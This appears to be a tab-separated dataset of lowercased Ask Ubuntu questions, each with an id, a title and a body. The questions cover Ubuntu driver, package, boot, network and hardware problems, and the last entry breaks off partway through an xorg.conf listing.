363190	how to convert typing in english to malayalam ?	i know malayalam language . but i do n't have typing speed in malayalam . how can one type malayalam in english ? e.g . : if i type `` malayalam '' then it should appear as malayalam in malayalam language . how is it possible ?
363192	hp pavilltion dv6-6051er ubuntu 13.10 ( and previous versions ) black screen after installing amd drivers	i have intel-amd hybrid graphics . every time after trying to update to fglrx i 'm getting black screen or some `` low graphics mode '' , that hangs at some point . is that even possible to get this working ? also , how can i check my notebook for permoframce issues ? i have 4 gb of ram and quad core i5 cpu , but when i 'm working in eclise and chrome for example it 's staring to work very slow sometimes . expecially , when i 'm using lences .
363193	upgraded to 13.10 9 key layout is now upside down 7 8 9 is now 1 2 3	what do i need to revert back to have my 9 key work properly . i do a lot of data entry and cant work like this . there is no way to switch to atm style for the numeric keypad anymore .
363196	diagnose wifi connection , ubuntu 13.04 and lenovo u310	i own a lenovo u310.. i know the notebook has a reputation for having wireless problems.. mine was manofactured this year and works great when connected to most wifi adapters.. but there are a few that i frequent that i 'm not able to connect , here is an extract of the syslog : oct 19 20:34:46 lenovou310 wpa_supplicant [ 1388 ] : wlan0 : sme : trying to authenticate with f8 : d1:11:24 : c4:14 ( ssid='fast & funny cafe y comidas 2 ' freq=2452 mhz ) oct 19 20:34:46 lenovou310 kernel : [ 2684.160763 ] wlan0 : authenticate with f8 : d1:11:24 : c4:14 oct 19 20:34:46 lenovou310 kernel : [ 2684.183288 ] wlan0 : send auth to f8 : d1:11:24 : c4:14 ( try 1/3 ) oct 19 20:34:46 lenovou310 networkmanager [ 1042 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating oct 19 20:34:46 lenovou310 wpa_supplicant [ 1388 ] : wlan0 : trying to associate with f8 : d1:11:24 : c4:14 ( ssid='fast & funny cafe y comidas 2 ' freq=2452 mhz ) oct 19 20:34:46 lenovou310 kernel : [ 2684.186121 ] wlan0 : authenticated oct 19 20:34:46 lenovou310 kernel : [ 2684.186508 ] wlan0 : waiting for beacon from f8 : d1:11:24 : c4:14 oct 19 20:34:46 lenovou310 networkmanager [ 1042 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating oct 19 20:34:46 lenovou310 networkmanager [ 1042 ] : < info > ( wlan0 ) : supplicant interface state : associating - > disconnected oct 19 20:34:46 lenovou310 networkmanager [ 1042 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning oct 19 20:34:46 lenovou310 networkmanager [ 1042 ] : < warn > activation ( wlan0/wireless ) : association took too long . oct 19 20:34:46 lenovou310 networkmanager [ 1042 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] oct 19 20:34:46 lenovou310 networkmanager [ 1042 ] : < warn > activation ( wlan0/wireless ) : asking for new secrets oct 19 20:34:46 lenovou310 networkmanager [ 1042 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > disconnected oct 19 20:34:46 lenovou310 networkmanager [ 1042 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . oct 19 20:34:49 lenovou310 kernel : [ 2687.265386 ] ideapad_laptop : unknown event : 1 oct 19 20:35:11 lenovou310 kernel : [ 2709.580665 ] ideapad_laptop : unknown event : 1 oct 19 20:35:34 lenovou310 kernel : [ 2731.909889 ] ideapad_laptop : unknown event : 1 any ideas what is happening ? i have problems connecting to 2 different adapters..
363198	errors in linux-headers-3.2.0-40-generic	i was trying to install nfs-common and received the following errors root @ ni-cr-ald-ngs1 : //usr/src # apt-get install nfs-common reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-headers-3.2.0-40-generic : depends : linux-headers-3.2.0-40 but it is not going to be installed nfs-common : depends : libgssglue1 but it is not going to be installed depends : libnfsidmap2 but it is not going to be installed depends : libtirpc1 but it is not going to be installed depends : rpcbind ( > = 0.2.0-6ubuntu1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i followed the advice and ran apt-get -f install and received errors about disk space . i checked and none of my file systems are full . root @ ni-cr-ald-ngs1 : //usr/src # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : lib32bz2-1.0 libcdio10 pnm2ppa lp-solve libunique-1.0-0 linux-headers-3.0.0-20-server libgmime-2.4-2 libunity6 libcdio-paranoia0 lib32ncurses5 libicu44 hplip-cups linux-headers-3.0.0-29-generic lib32tinfo5 ubufox libtaglib2.0-cil libgkeyfile1.0-cil zeitgeist-extension-fts libgudev1.0-cil linux-headers-3.0.0-12 linux-headers-3.0.0-20 linux-headers-3.0.0-17 linux-headers-3.0.0-30 patchutils linux-headers-3.0.0-29 libtextcat-data libglew1.5 libproxy0 libdee-1.0-1 libgexiv2-0 libutouch-evemu1 libgnomevfs2-common libgupnp-1.0-3 linux-headers-3.0.0-12-server libutouch-geis1 libutouch-frame1 libwebkitgtk-1.0-common python-indicate libnux-1.0-common libindicator3-6 banshee libmysqlclient16 lib32ffi6 python-webkit python-aptdaemon.gtkwidgets linux-headers-3.0.0-30-server libindicator6 gir1.2-gconf-2.0 lib32asound2 libept1 linux-headers-3.0.0-29-server banshee-extension-soundmenu cups-driver-gutenprint libgnomevfs2-0 libmono-zeroconf1.0-cil libcolamd2.7.1 python-telepathy linux-headers-3.0.0-17-generic libidl0 libgdata1.7-cil libminiupnpc5 libnotify0.4-cil linux-headers-3.0.0-17-server libpoppler-glib6 python-aptdaemon-gtk libtextcat0 libgtk-sharp-beans-cil gnome-utils-common linux-headers-3.0.0-30-generic libhunspell-1.2-0 unity-2d-places libutouch-grail1 libjpeg62 : i386 libquvi0 lib32ncursesw5 libexiv2-10 libgupnp-igd-1.0-3 gnome-desktop-data libgtkspell3-0 liborbit2 libnautilus-extension1 libwebkitgtk-1.0-0 gir1.2-dee-0.5 libcdio-cdda0 python-wnck lib32stdc++6 linux-headers-3.0.0-20-generic libglewmx1.5 min12xxw libnux-1.0-0 libgmime2.4-cil libnatpmp1 libpoppler13 dpatch unity-2d-launcher libgssdp-1.0-2 icc-profiles-free libllvm2.9 libllvm2.9 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-headers-3.2.0-40 the following new packages will be installed : linux-headers-3.2.0-40 0 upgraded , 1 newly installed , 0 to remove and 554 not upgraded . 12 not fully installed or removed . need to get 0 b/11.7 mb of archives . after this operation , 56.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 394783 files and directories currently installed . ) unpacking linux-headers-3.2.0-40 ( from ... /linux-headers-3.2.0-40_3.2.0-40.64_all.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-40_3.2.0-40.64_all.deb ( -- unpack ) : unable to create /usr/src/linux-headers-3.2.0-40/arch/arm/mach-shmobile/include/mach/zboot_macros.h.dpkg-new ' ( while processing./usr/src/linux-headers-3.2.0-40/arch/arm/mach-shmobile/include/mach/zboot_macros.h ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.2.0-40_3.2.0-40.64_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ ni-cr-ald-ngs1 : //usr/src # df -h filesystem size used avail use % mounted on /dev/sda5 2.6g 1.5g 999m 60 % / udev 24g 8.0k 24g 1 % /dev tmpfs 9.5g 836k 9.5g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 24g 376k 24g 1 % /run/shm cgroup 24g 0 24g 0 % /sys/fs/cgroup /dev/mapper/vg01-lvol1 1.7t 671g 895g 43 % /u01 /dev/sda6 1.9g 295m 1.5g 17 % /tmp /dev/sda11 1.9g 1.5g 287m 84 % /home /dev/sda2 139m 86m 46m 66 % /boot /dev/sda9 5.5g 513m 4.8g 10 % /opt /dev/sda7 5.5g 3.8g 1.5g 73 % /usr /dev/sda8 5.5g 2.5g 2.8g 48 % /var /dev/sda10 2.8g 1.6g 1.1g 60 % /usr/local //ni-cr-svc-nas2/ald-ngs1 8.2t 4.5t 3.8t 55 % /mnt/from-nas2 none 24g 1.1m 24g 1 % /tmp/guest-ubleyh root @ ni-cr-ald-ngs1 : //usr/src # i do n't see how it says /usr is out of space , there is 1.5g free . apt-get remove does n't allow me to remove anything giving the errors about linux-headers-3.2.0-40-generic , but i 'm actually booted off 3.2.0-38-generic root @ ni-cr-ald-ngs1 : /usr/src # apt-get remove linux-headers-3.2.0-40-generic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-headers-generic : depends : linux-headers-3.2.0-40-generic but it is not going to be installed linux-headers-server : depends : linux-headers-3.2.0-40-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ ni-cr-ald-ngs1 : /usr/src # root @ ni-cr-ald-ngs1 : /usr/src # uname -r 3.2.0-38-generic i also do not see the 3.2.0-40 source directory which i believe is the actual problem since the links under /usr/src/3.2.0-40-generic point back to it . root @ ni-cr-ald-ngs1 : /usr/src # ll linux-headers-3.2.0-40-generic/arch/arm lrwxrwxrwx 1 root root 37 mar 25 2013 linux-headers-3.2.0-40-generic/arch/arm - > ../../linux-headers-3.2.0-40/arch/arm root @ ni-cr-ald-ngs1 : /usr/src # file linux-headers-3.2.0-40-generic/arch/arm linux-headers-3.2.0-40-generic/arch/arm : broken symbolic link to `../../linux-headers-3.2.0-40/arch/arm' my major goal is to get nfs running properly . but obviously i need to clean up my other issues . any help would be greatly appreciated . thanks , charlie
363200	e : unable to correct problems , you have held broken packages	i am using ubuntu 13.04 which i installed few days back . i am trying to install nodejs and npm . i tried to install from command line first and then uninstalled it . then something broke . sudo apt-get install -f nodejs npm reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nodejs : conflicts : npm e : unable to correct problems , you have held broken packages . the output of /etc/apt/sources.list is below cat /etc/apt/sources.list # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //in.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //in.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //in.archive.ubuntu.com/ubuntu/ raring universe deb http : //in.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //in.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //in.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //in.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main the output of cat /etc/apt/sources.list.d/* is below cat /etc/apt/sources.list.d/* deb http : //ppa.launchpad.net/chris-lea/node.js/ubuntu raring main # deb-src http : //ppa.launchpad.net/chris-lea/node.js/ubuntu raring main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main deb http : //deb.opera.com/opera/ stable non-free deb http : //deb.opera.com/opera/ stable non-free deb http : //deb.opera.com/opera/ stable non-free deb http : //deb.opera.com/opera/ stable non-free
363201	unable to launch software center	on opening software center , it auto automatically closes and shows this warning : warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop/sonic-visualiser : x-sonicvisualiser-layer.desktop' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application
363202	how to choose between windows and ubuntu at startup	i 'm new to ubuntu and been wanting to install it on my laptop . only thing i was wondering before doing so is will i receive the option to switch between it and windows at start up ? and which option do i select during installation to make it possible ? i have read a few things and saw that there were multiple options and depending on which were selected you would get rid of windows or still keep it . oh and would i also have to have split up my hdd into smaller partitions and have one before installing ubuntu or will it use the part of the partition from either drive c or data drive d ?
363203	how to uninstall java 7 binaries installed from oracle ?	i installed java 7 using the instructions here : http : //www.wikihow.com/install-oracle-java-on-ubuntu-linux i want to know how to revert this i.e . uninstall java 7 . i am on ubuntu 13.10 64 bit
363204	permanently disable bluetooth	i simply do n't use bluetooth . since it can be a security risk and also drains the battery i would like to keep it deactivated . i quickly found the option to turn it off in the settings menu , but the problem is : it does n't stay dead ! everytime i pull my nexus 4 out of standby mode bluetooth reappears in the top bar as if i never deactivated it . how can i deactivate it so it stays deactivated or better yet how can i remove it from my phone entirely ? i tried sudo apt-get remove bluez bluetooth , but i am not allowed to edit this package .
363205	13.10 autohide launcher breaks multiple monitor setup	when i set the launcher to autohide , my mouse cursor gets stuck on the one monitor , and when i move the mouse to the hotspot and apply pressure to the edge of the screen it wo n't appear . is this a bug or is there something i can do to fix this ?
363206	can not access secondary gpu running bumblebee	i 'm trying to get bumblebee working again after an upgrade to saucy . running software with optirun gives the following output : optirun nvidia-settings [ 45.697126 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) failed to load /usr/lib/xorg/modules/libglamoregl.so : /usr/lib/xorg/modules/libglamoregl.so : undefined symbol : _glapi_tls_context [ 45.697179 ] [ error ] aborting because fallback start is disabled . does anyone know how to fix this ? thanks ! : )
363207	what is the difference between the rsa , dsa , and ecdsa keys that ssh uses ?	in my /etc/ssh/ directory , i can see three that i have three different types of ssh keys : -rw -- -- -- - 1 root root 607 oct 4 22:43 ssh_host_dsa_key -rw-r -- r -- 1 root root 623 oct 4 22:43 ssh_host_dsa_key.pub -rw -- -- -- - 1 root root 241 oct 4 22:43 ssh_host_ecdsa_key -rw-r -- r -- 1 root root 194 oct 4 22:43 ssh_host_ecdsa_key.pub -rw -- -- -- - 1 root root 1602 oct 4 22:43 ssh_host_rsa_key -rw-r -- r -- 1 root root 378 oct 4 22:43 ssh_host_rsa_key.pub what is are the differences between ssh 's rsa , dsa , and ecdsa keys , and do i need all three ?
363208	installing ubuntu from cd fatal error	i 'm trying to install ubuntu 13.10 from the cd . whenever it gets to the screen to allocate the drive space , no disk drive is listed . i want to run ubuntu alongside my windows 7 and is not giving me that option . just a blank screen where the drives are supposed to be located . i 'm afraid to hit the `` install now '' button thinking it will delete my entire harddrive .
363212	how to upgrade ubuntu-13.04 using a downloaded iso without burning cd or liveusb within ubuntu 13.04 ?	this is a popular question , i tried this suggestion can i update from `` ubuntu-12.04-desktop-i386.iso '' file ? , but problem is gksu `` sh /media/cdrom/cdromupgrade '' asks for a password , and even if i enter the correct password it says wrong . and btw , i do n't see any cdromupgrade file file in my ubuntu-13.10-desktop-amd64.iso . so , what is the way to upgrade without using the live-usb or cd within ubuntu from an ubuntu iso ?
363213	is my partition useless ?	installed ubuntu , and it did n't give me a choice as to where it was going to be installed . partitioned about half my drive before , is my partition useless now ?
363214	focusrite saffire 6 usb	i have just installed ubuntu 13.10 , and i just realized that my sound-card does n't work . this is the card stated in the title . it does n't seem like it recognize it . here 's the list of my connected usb devices : bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 005 : id 1532:0037 razer usa , ltd bus 003 device 004 : id 045e:075d microsoft corp. lifecam cinema bus 003 device 007 : id 1038:1202 ideazon , inc . bus 003 device 003 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 003 device 008 : id 1235:0010 novation ems bus 003 device 006 : id 13b2:0063 alesis bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub thanks : )
363215	how do i adjust the brightness settings on a samsung n210 ?	i have two samsungs n210 . you can turn the brightness up and down with the function key and the keyboard arrows ( up and down ) . i´ve installed ubuntu 13.04 in one of them , and it works like a charm . now that i´ve done the same installation in the other machine , the screen bright won´t change . i´ve used the very same file in both installs . the functionality seems to be there ( the bright control does appear when i use the function key with the up and down arrows ) , but the bright won´t change . what should i do ? i´ve read some other solutions , but their laptops are not the same as mine .
363216	ubuntu 12.04 - vsftpd problem - 500 illegal port command	i have an connection problem to my vsftpd server : 211 end help site 214-the following commands are recognized . abor acct allo appe cdup cwd dele eprt epsv feat help list mdtm mkd mode nlst noop opts pass pasv port pwd quit rein rest retr rmd rnfr rnto site size smnt stat stor stou stru syst type user xcup xcwd xmkd xpwd xrmd 214 help ok. opts utf8 on 200 always in utf8 mode . cwd / 250 directory successfully changed . connect ok ! pwd 257 `` / '' read directory type a 200 switching to ascii mode . pasv 227 entering passive mode ( 192.168.5.100,131,16 ) . server reports local ip - > redirect to : xxx.xxx.xxx.172 switch 'break ' acknowledged ! port 192,168,2,10,222,121 500 illegal port command . ubuntu server address - 192.168.5.100 router address - 192.168.5.1 vsftpd settings : listen=yes anonymous_enable=no local_enable=yes write_enable=yes anon_upload_enable=no anon_mkdir_write_enable=no dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=no xferlog_file=/var/log/vsftpd.log xferlog_std_format=yes idle_session_timeout=180 ftpd_banner=welcome to rogers ftp s1rvices . chroot_local_user=yes chroot_list_enable=yes chroot_list_file=/etc/vsftpd.chroot_list secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem listen_port=16499 pasv_min_port=34720 pasv_max_port=34722 max_clients=1 max_per_ip=1 max_login_fails=4 tcp_wrappers=yes i tried to connect with telnet : # telnet localhost 16499 connected to localhost . escape character is '^ ] ' . 220 welcome to my ftp server . in my router ( fritzbox ) the tcp ports 34720-34722 and 28001 ( redirected to 16499 ) are opened and redirected to ubuntu servers address - 192.168.5.100 .
363217	processes switch to `` stopped '' randomly	on a vps of mine i decided to install ubuntu 12.04 . it is a small server , with 20gb of disk size and 512mb of ram . for some time it worked fine but since a few days , each time i start an application , after a few seconds it is set to `` stopped '' , probably by the operating system . this even affects the `` apt-get '' command : when it is performing an operation it is simply stopped after a few seconds . the natural thing to do in this case is typing `` fg '' , but after a few seconds the process is `` stopped '' again . the exact message is : [ 2 ] + < process_name > stopped any idea what the problem is ? weirdly enough , reinstalling the os did not solve the problem ... thanks ! edit : can it be a memory overflow problem ?
363222	where to find driver for startech svid2usb2 in ubuntu 13.04 ?	i am trying to get an elmo ptc-100s video camera to work on ubuntu 13.04 . i am using a svid2usb2 startech converter to change either the s video or the rca output to usb . neither work . ubuntu recognizes there is a video device , but the video feed is black regardless of the program i use to view the feed . specific question : where do i find a driver for this that works with ubuntu ? the official website does n't have one ( at least i could not find one . )
363223	touchpad edge scrolling not working on upgrading to ubuntu 13.10	i just upgraded to ubuntu 13.10 and now i ca n't use edge scrolling on my laptop 's touchpad ! why is this happening ? ! a few hours back everything was fine in 13.04 . is this a bug ? any workarounds available ? ps : my laptop is a lenovo g570 with intel core i5 @ 2.3ghz
363224	xubuntu 13.10 : keyboard layout ignored ( live cd and installation )	using the new xubuntu 13.10 64 bits installation cd , i ca n't get french keyboard to work . running live cd , i chose french langage , but keyboard layout seems to be the english one . after installation and reboot , lightdm still does n't use french keyboard layout , neither xfce session does . i was able switch layout using setxkeyboard or xfce applet , but this does n't apply on lightdm and other session or reboot .
363233	ubuntu on tablets	how would i go about getting a dual boot on my android device with ubuntu tablet ? i 'm using a creative zen touch 2 , an old thing i use for development .
363234	purple screen on boot , imac	i have just installed ubuntu 13.10 ( special imac iso found here ) on the new imac ( dual boot ) . installation of refit was completed successfully , as well as the installation of ubuntu itself . after the final reboot , refit sees this distributive and allows the choice . when i select `` boot linux from hd '' , it sends me to grub screen , where i can select ubuntu . and then it gets stuck on the purple screen ( smpboot : booting node 0 , processors # 1 -- for the recovery mode ) with no further action . does anybody know a solution to this problem ? p.s . : i have also tried both 32 and 64-bit pc distributives ( occasionally ) with the same result .
363239	problem with function fpos_t and fgetpos	when i try to use those functions it sends this error : main.cpp : in function ‘int main ( ) ’ : main.cpp:11:17 : error : conversion from ‘int’ to non-scalar type ‘fpos_t { aka _g_fpos_t } ’ requested main.cpp:18:20 : error : can not convert ‘fpos_t { aka _g_fpos_t } ’ to ‘file* { aka _io_file* } ’ for argument ‘1’ to ‘int fgetpos ( file* , fpos_t* ) ’ the code is : # include < stdio.h > struct registro { char nombre [ 5 ] ; } ; int main ( ) { file *fp ; registro datos [ 5 ] ; fpos_t posicion=5 ; fp = fopen ( `` nombres.txt '' , '' w '' ) ; //crea un archivo de texto printf ( `` ingrese nombre : `` ) ; gets ( datos [ 1 ] .nombre ) ; fgetpos ( posicion , fp ) ; fwrite ( & datos [ 1 ] ,5,1 , fp ) ; //escribe el valor de datos en fp , con un tamaño de 5 fflush ( stdin ) ; fclose ( fp ) ; } if you see any error please help .
363243	grub2 shows purple screen on bootup	when booting my ( even w/o problems slow ) computer ( raring x64 only , grub2 ) , grub shows me an purple screen after selection ( timeout 0 ) and before actually booting ubuntu . this is really annoying because it stays there for about 15 seconds , which is actually more than it needs to start grub and boot ubuntu . my /etc/default/grub ( comments removed ) : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # grub_terminal=console # grub_gfxmode=640x480 # grub_disable_linux_uuid=true # grub_disable_recovery= '' true '' # grub_init_tune= '' 480 440 1 '' what can i do to avoid this problem ? i did n't change the file except setting the timeout to 0 because i thought it 's waiting 10 seconds , but does n't show up .
363246	nvidia optimus , ubuntu 12.04 , no device detected	i have a dell xps . i followed this tutorial to get nvidia working : https : //wiki.ubuntu.com/hardwaresupport/machines/laptops/dell/xps/15z i try to run the glxspheres and it fails with the message below : optirun -vv -debug glxspheres [ 29.736785 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 29.737854 ] [ debug ] optirun version 3.2.1 starting ... [ 29.737895 ] [ debug ] active configuration : [ 29.737906 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 29.737916 ] [ debug ] x display : ebug [ 29.737925 ] [ debug ] ld_library_path : /usr/lib/nvidia-304 : /usr/lib32/nvidia-304 [ 29.737935 ] [ debug ] socket path : /var/run/bumblebee.socket [ 29.737944 ] [ debug ] accel/display bridge : auto [ 29.737953 ] [ debug ] vgl compression : proxy [ 29.737962 ] [ debug ] vglrun extra options : [ 29.737972 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 29.738223 ] [ debug ] using auto-detected bridge virtualgl [ 30.336829 ] [ info ] response : no - error : [ xorg ] ( ee ) no devices detected . [ 30.336882 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 30.336902 ] [ debug ] socket closed . [ 30.336945 ] [ error ] aborting because fallback start is disabled . [ 30.336964 ] [ debug ] killing all remaining processes .
363247	handbreak installtion fail	i just got ubuntu the other day on my brand spanking new , yummy 8-core pc . anyways , i was trying to get handbrake to convert/compress my videos for file transfer . so i looked it up , and found the `` ppa '' installation that went something like ; # to add one of these to your sources , simply run : sudo add-apt-repository ppa : stebbins/handbrake-releases or sudo add-apt-repository ppa : stebbins/handbrake-snapshots depending on which you want . # to install handbrake , run : sudo apt-get update sudo apt-get install handbrake-gtk # alternatively , if you would prefer the cli over the gui , replace the last line with : sudo apt-get install handbrake-client anyway , i did this , but when i did sudo apt-get install handbreak-gtk it came up with : sudo apt-get install handbrake-client . reading package lists ... done . building dependency tree . reading state information ... done . e : unable to locate package handbrake-client any help ?
363253	if i use wubi to install ubuntu , can i use windows control panel to uninstall it if i do n't like it ?	dell vostro 200 windows xp service pack 3 , 32 bit intel core 2 duo cpu @ 2.4 ghz ram 2037 mb
363254	restoring android after ubuntu touch fails	i 'm trying to restore android after playing around with ubuntu touch i follow exactly the same steps described the ubuntu 's wiki page i.e . download the factory image corresponding to your device 's model and version ( initial table has links ) . ensure the device is connected and powered on . extract the downloaded file and cd into the extracted directory . run adb reboot-bootloader run ./flash-all.sh ( use sudo if lack of permissions on the workstation do n't allow you to talk to the device ) . the archive is downloaded successfully , checked the sha1 checksum everything is ok . but the ./flash-all.sh fails like this sending 'bootloader ' ( 2308 kb ) ... okay [ 0.513s ] writing 'bootloader ' ... okay [ 0.292s ] finished . total time : 0.805s rebooting into bootloader ... okay [ 0.007s ] finished . total time : 0.008s sending 'radio ' ( 12288 kb ) ... okay [ 2.668s ] writing 'radio ' ... okay [ 1.372s ] finished . total time : 4.040s rebooting into bootloader ... okay [ 0.009s ] finished . total time : 0.009s archive does not contain 'boot.sig' archive does not contain 'recovery.sig' failed to allocate 435793780 bytes error : update package missing system.img my device is nexus 4 . tried both 4.2.2 and 4.3 androind versions for nexus 4 still the same . any ideas how problem can be solved ?
363255	( l ) ubuntu 13.10 amd ati radeon laptop screen is black after upgrade from 13.04	since i updated to lubuntu 13.10 ( 64 bit ) as upgrade from 13.04 , my laptop screen is black . my external monitor over hdmi works . i have an amd ati radeon hd 5470 card . the laptop screen starts ok , i see grub , the lubuntu start with dots and when the lightdm gui should start , it the laptop screen turns black . at the same time the external monitor ( hdmi ) starts showing the gui . i have a dual boot system with windows and in windows it works ok . the fn+brightness keys work also on lubuntu - i see the brightness indicator at 100 % in the lubuntu external monitor . i tried fglrx , the latest amd proprietary beta driver , and have currently fglrx-updates . same result with all . in amdcccle panel the lvds looks ok . i can enable / disable it , configure it , etc , but it just remains black . it does not seem to be directly an a config issue , as same config used to work in 13.04 . i have been looking at the forums since two days and trying various stuff , without any result . may be someone has a clue for me . some more information : $ dpkg -l fglrx* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= un fglrx-amdcccle ( no description available ) ii fglrx-amdcccle 2:13.101-0ub amd64 catalyst control center for the a un fglrx-control ( no description available ) un fglrx-control- ( no description available ) un fglrx-driver ( no description available ) un fglrx-glx ( no description available ) ii fglrx-updates 2:13.101-0ub amd64 video driver for the amd graphics $ lspci | grep -i vga 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] park [ mobility radeon hd 5430/5450/5470 ] $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati mobility radeon hd 5400 series opengl version string : 4.2.12337 compatibility profile context 13.101 /etc/x11/xorg.conf section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` 0-lvds '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` targetrefresh '' `` 60 '' option `` position '' `` 1920 312 '' option `` rotate '' `` normal '' option `` disable '' `` true '' endsection section `` monitor '' identifier `` 0-dfp1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-lvds '' `` 0-lvds '' option `` monitor-dfp1 '' `` 0-dfp1 '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 